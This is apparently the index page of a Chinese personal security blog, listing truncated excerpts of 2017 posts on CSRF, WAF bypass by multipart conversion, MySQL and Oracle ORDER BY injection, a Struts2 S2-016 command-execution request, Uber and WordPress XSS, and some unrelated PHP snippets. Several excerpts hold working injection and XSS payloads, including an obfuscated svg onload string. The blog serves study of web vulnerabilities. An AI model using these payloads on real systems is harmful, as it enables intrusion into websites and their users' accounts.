CSRF 跨站请求伪造攻击与防御 — CSRF防御策略

看过程能让你更了解如何的安全编码，看文中红字结果让你知道防范措施。什么是CSRF 跨站请求伪造 CSRF（Cross-site request forgery），中文名称：跨站请求伪造，也被称为：one click attack/session riding，缩写为：CSRF/XSRF。那么CSRF到底能够干嘛呢？你可以这样简单的理解：攻击者可以盗用你的登陆信息，以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学...

2017年10月26日学习笔记暂无评论喜欢 0 阅读 2,995 views 次阅读全文

密码保护：Post、Get数据包转为上传multipart/form-data格式数据包php脚本

Post、Get数据包转为上传multipart/form-data格式数据包php脚本说一下写这个工具的初衷吧。有很多时候某些程序接收参数的方式都是通用的，那咱们就可以利用这种方式来绕过WAF等验证来进行攻击。只需要转换一下格式即可。在线转换地址：https://woj.app/multipart.php Burp Post、Get数据包在线转换工具 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24...

2017年10月24日学习笔记要查看留言请输入您的密码。喜欢 2 阅读 3,713 views 次阅读全文

MySQL Order By 注入总结

oracle Order By 注入 desc,if( (select 1 from dual where 1=1*)=1 ,1,(select 1 from information_schema.tables)) desc MySQL Order By 注入 select user from user order by user,If((1=1),1,(select user from mysql.user)) desc; abs(jjdm-(length(user())=23)*8000) 前言最近在做一些漏洞盒子后台项目的总结，在盒子众多众测项目中，注入类的漏洞占比一直...

2017年10月24日汪洋大海暂无评论喜欢 0 阅读 2,784 views 次阅读全文

php 数据包的分组与合并 parse_str与http_build_query的使用

php 数据包的分组与合并 parse_str与http_build_query的使用 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 <?php //parse_str与http_build_query的使用 //使用parse_str将url字符串转变为key=>value的数组 $str = "tn=monline_dg&ie=utf-8&bs=httpbuildurl&f=3&rsv_bp=1&...

2017年10月24日汪洋大海暂无评论喜欢 0 阅读 5,313 views 次阅读全文

密码保护：SN — 另类执行Struts2命令及 SQL注入

先说一下Struts2 2013 S2-016的测试payload代码是如下的。 GET /xxxxxxx/rf/userAction!login.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%...

2017年10月23日学习笔记要查看留言请输入您的密码。喜欢 0 阅读 3,071 views 次阅读全文

Uber Bug Bounty: Turning Self-XSS into Good-XSS

Now that the Uber bug bounty programme has launched publicly, I can publish some of my favourite submissions, which I’ve been itching to do over the past year. This is part one of maybe two or three posts. On Uber’s Partners portal, where Drivers can login and update their details, I found a very simple, classic XSS: changing the value of one of...

2017年10月22日汪洋大海暂无评论喜欢 0 阅读 3,756 views 次阅读全文

dedecms (首页、列表)等页面提取内容中第一张图片代码

在include/extend.func.php 最下方增加下面的代码。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 function Getpic($body) { $getpic = ''; preg_match_all("/(src)=[\"|'| ]{0,}([^>]*\.(gif|jpg|bmp|png))/isU",$body,$img_array); $img_array = array_unique($img_array[2]); if(c...

2017年10月21日学习笔记暂无评论喜欢 0 阅读 2,999 views 次阅读全文

WordPress全版本储存型XSS漏洞

漏洞发现者： SecJack 安全周@上海匡创漏洞概述及危害建站程序类型：php+MySql 漏洞类型：储存型XSS 缺陷文件： formatting.php 漏洞参数：<svg onload=alert('1')> ,（进行混淆）代码如下： <svg onload=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([!...

2017年10月19日汪洋大海评论 3 条喜欢 0 阅读 5,546 views 次阅读全文

企业生存之 — 挖坑

挖坑首先这个“挖坑”无论放在哪里我觉得它就不是一个褒义词。在企业上班中经常就会遇到各种各样的人，而“挖坑”存在着给别人挖坑，给自己挖坑。先讲一讲给自己挖坑。给自己挖坑虽然从字面理解就是针对自己而已，但实际上有时候给自己挖坑还会带上别人。这样不仅仅是坑了自己，还会坑了他人，坑了自己，自己也就吃一堑长一智了，如果坑了他人那坑的就是关系了。说说我自己身...

2017年10月19日个人日记暂无评论喜欢 2 阅读 3,446 views 次阅读全文

JSONP 跨域请求数据代码(跨域请求数据包)

同事非想看，没办法弄一段代码给对方展示JSONP跨域请求，只要把下面的代码保存到本地，然后打开就可以获取到JSONP的信息。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN&qu...

2017年10月17日学习笔记暂无评论喜欢 0 阅读 2,699 views 次阅读全文

蜗居

窄小蜗居，虽非富贵王侯宅；清闲螺径，也异寻常百姓家。 woj → 蜗居